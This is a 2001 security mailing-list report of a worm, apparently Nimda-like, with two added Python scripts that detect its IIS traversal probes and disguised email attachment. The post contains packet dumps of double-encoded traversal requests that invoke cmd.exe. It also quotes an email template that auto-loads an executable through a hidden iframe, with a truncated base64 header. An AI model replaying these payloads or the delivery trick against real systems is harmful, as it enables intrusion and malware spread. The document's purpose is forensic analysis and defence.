New worm? 'readme.eml'

From: Pedro Miller Rabinovitch (pedro@cipher.com.br)
Date: 09/18/01


Message-Id: <a05001905b7cd14f52dda@[192.168.1.71]>
Date: Tue, 18 Sep 2001 12:13:32 -0300
To: forensics@SECURITYFOCUS.COM
From: Pedro Miller Rabinovitch <pedro@cipher.com.br>
Subject: New worm? 'readme.eml'

Hi,

   is this CodeBlue? Some new worm? Or just one I hadn't heard about?
It uses double-encoding exploits, and propagates both by adding
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date     Time   D  Source IP        Sport  Dport  P
01Sep18  11:20  T  200.192.226.40   3933   80     T
01Sep18  11:20  T  200.192.226.40   3767   80     T
01Sep18  11:20  T  200.192.226.40   3572   80     T

  SOURCE: 200.192.226.40

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx  E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00  ...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx  E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00  ...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx  E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00  .].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e  GET /msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e  /..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e  .%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79  /..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69  stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77  r HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73  w..Connnection: clos
  65 0d 0a 0d 0a                                                e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I
saw the normal web page for the institution, plus a pop-up window for
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
follows:

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,

        Pedro.

-- 
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br
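
The three request lines in the packet dumps above never contain a literal "../" or "..\": they rely on "%255c", which becomes "%5c" and then a backslash only if the server percent-decodes twice, and on "%c1%1c", an overlong two-byte sequence that a lenient UTF-8 decoder folds to a backslash. The Python script below is an added example written for this page, not code from the original post: it normalizes a request path the way such a lenient server would (repeated percent-decoding, overlong-UTF-8 folding, backslash to slash) and reports the traversal depth and the presence of cmd.exe, so a log reviewer can flag these probes from the raw request line. The first three sample lines are reconstructed from the dumps; the fourth is a constructed benign request for contrast; the function names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample input: the three request lines reconstructed from the
# packet dumps in the report, plus one benign request (constructed) for contrast.
SAMPLE_REQUESTS = [
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /images/logo%20small.gif HTTP/1.0",
]

# A two-byte escape whose lead byte is 0xC0 or 0xC1 can only be an overlong form.
OVERLONG_ESCAPE = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)


def lenient_utf8_decode(data: bytes) -> bytes:
    """Fold two-byte sequences with an overlong lead byte (0xC0 or 0xC1) back to
    the ASCII byte they encode, even when the second byte is not a valid
    continuation byte.  A strict decoder rejects these; the lenient behaviour
    modelled here is what makes %c1%1c read as a backslash:
    ((0xC1 & 0x1F) << 6) | (0x1C & 0x3F) == 0x5C.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data):
            value = ((lead & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if value < 0x80:
                out.append(value)
                i += 2
                continue
        out.append(lead)
        i += 1
    return bytes(out)


def normalize_path(raw_path: str, max_rounds: int = 4):
    """Percent-decode until the path stops changing (so %255c -> %5c -> '\\'),
    then apply the lenient UTF-8 fold and unify '\\' with '/'.
    Returns (normalized_path, number_of_decode_rounds_that_changed_something).
    """
    current = raw_path.encode("latin-1")
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    current = lenient_utf8_decode(current)
    return current.decode("latin-1").replace("\\", "/"), rounds


def analyze_request(request_line: str) -> dict:
    """Classify one HTTP request line: normalized path, traversal depth
    (number of '..' segments after normalization) and a list of findings."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    raw_path = target.split("?", 1)[0]          # query string is not part of the path
    normalized, rounds = normalize_path(raw_path)
    depth = normalized.split("/").count("..")
    findings = []
    if rounds >= 2:                             # a second round still found escapes
        findings.append("double_encoding")
    if OVERLONG_ESCAPE.search(raw_path):
        findings.append("overlong_utf8")
    if depth > 0:
        findings.append("traversal")
    if "cmd.exe" in normalized.lower():
        findings.append("cmd_exe")
    return {"path": normalized, "depth": depth, "findings": findings}


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        result = analyze_request(line)
        print(result["findings"] or ["clean"], result["depth"], result["path"])
```

The depth figure is the useful signal for a log rule: a path one directory below the web root that climbs six levels has no legitimate reading, whatever encoding it arrived in, and the same normalization catches variants that swap "%255c" for "%c0%af" or mix the two.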

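
The readme.eml quoted above carries its executable in a part declared as audio/x-wav, named readme.exe, and pulled in by a zero-size iframe through a cid: reference, so a client that trusts the declared media type fetches and handles it without the user opening anything. As an added example, not code from the post, the Python script below uses the standard email module to walk a message of that shape and flag the three signs a mail gateway should key on: a payload whose magic bytes ("MZ") contradict the declared type, an executable filename under a media type, and a Content-ID referenced from a hidden iframe. The message text is constructed to mirror the report's structure (same boundaries, headers and iframe); its base64 body is a few placeholder bytes beginning with "MZ", not the worm, and the function names are my own.

```python
import base64
import re
from email import message_from_string

# Constructed attachment body: placeholder bytes that merely start with the "MZ"
# signature of a Windows executable.  This is NOT the worm from the report.
FAKE_EXE = b"MZ" + b"\x90\x00" * 8 + b"placeholder bytes for the example, not a program"

# Constructed message in the same shape as the readme.eml quoted in the report.
SAMPLE_EML = (
    "MIME-Version: 1.0\n"
    "Content-Type: multipart/related;\n"
    '        type="multipart/alternative";\n'
    '        boundary="====_ABC1234567890DEF_===="\n'
    "X-Priority: 3\n"
    "X-MSMail-Priority: Normal\n"
    "X-Unsent: 1\n"
    "\n"
    "--====_ABC1234567890DEF_====\n"
    "Content-Type: multipart/alternative;\n"
    '        boundary="====_ABC0987654321DEF_===="\n'
    "\n"
    "--====_ABC0987654321DEF_====\n"
    "Content-Type: text/html;\n"
    '        charset="iso-8859-1"\n'
    "Content-Transfer-Encoding: quoted-printable\n"
    "\n"
    "<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>\n"
    "<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>\n"
    "</iframe></BODY></HTML>\n"
    "--====_ABC0987654321DEF_====--\n"
    "\n"
    "--====_ABC1234567890DEF_====\n"
    "Content-Type: audio/x-wav;\n"
    '        name="readme.exe"\n'
    "Content-Transfer-Encoding: base64\n"
    "Content-ID: <EA4DMGBP9p>\n"
    "\n"
    + base64.b64encode(FAKE_EXE).decode("ascii") + "\n"
    "--====_ABC1234567890DEF_====--\n"
)

EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat")
CID_REF = re.compile(r"""src=["']?cid:([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_IFRAME = re.compile(r"""<iframe[^>]*\bheight=["']?0\b""", re.IGNORECASE)


def sniff(payload: bytes) -> str:
    """Identify a payload by its leading magic bytes, ignoring the declared type."""
    if payload.startswith(b"MZ"):
        return "mz-executable"
    if payload.startswith(b"RIFF"):
        return "riff-wav"
    return "unknown"


def inspect_eml(raw: str) -> list:
    """Walk every leaf part of a MIME message and return one record per
    non-text part, with the flags a gateway should raise for it."""
    msg = message_from_string(raw)
    referenced = set()      # Content-IDs pulled in through src="cid:..." in HTML parts
    hidden_iframe = False   # any zero-height iframe seen in an HTML part
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html = part.get_payload(decode=True).decode(
                part.get_content_charset() or "latin-1", "replace")
            referenced.update(CID_REF.findall(html))
            hidden_iframe = hidden_iframe or bool(HIDDEN_IFRAME.search(html))

    records = []
    for part in msg.walk():
        declared = part.get_content_type()
        if part.is_multipart() or declared.startswith("text/"):
            continue
        payload = part.get_payload(decode=True) or b""
        filename = part.get_filename() or ""          # falls back to Content-Type name=
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        sniffed = sniff(payload)
        flags = []
        if sniffed == "mz-executable" and not declared.startswith("application/"):
            flags.append("executable_disguised_as_media")
        if filename.lower().endswith(EXECUTABLE_EXTENSIONS):
            flags.append("executable_filename")
        if cid in referenced:
            flags.append("auto_loaded_by_hidden_iframe" if hidden_iframe
                         else "auto_loaded_by_cid")
        records.append({"declared": declared, "filename": filename, "cid": cid,
                        "sniffed": sniffed, "size": len(payload), "flags": flags})
    return records


if __name__ == "__main__":
    for rec in inspect_eml(SAMPLE_EML):
        print(rec["declared"], rec["filename"], rec["sniffed"], rec["flags"])
```

Each of the three flags is independent, and any one of them is enough to quarantine the message at a gateway; together they describe exactly the trick the report shows, a media-typed part that is really a program and that the HTML part loads on its own.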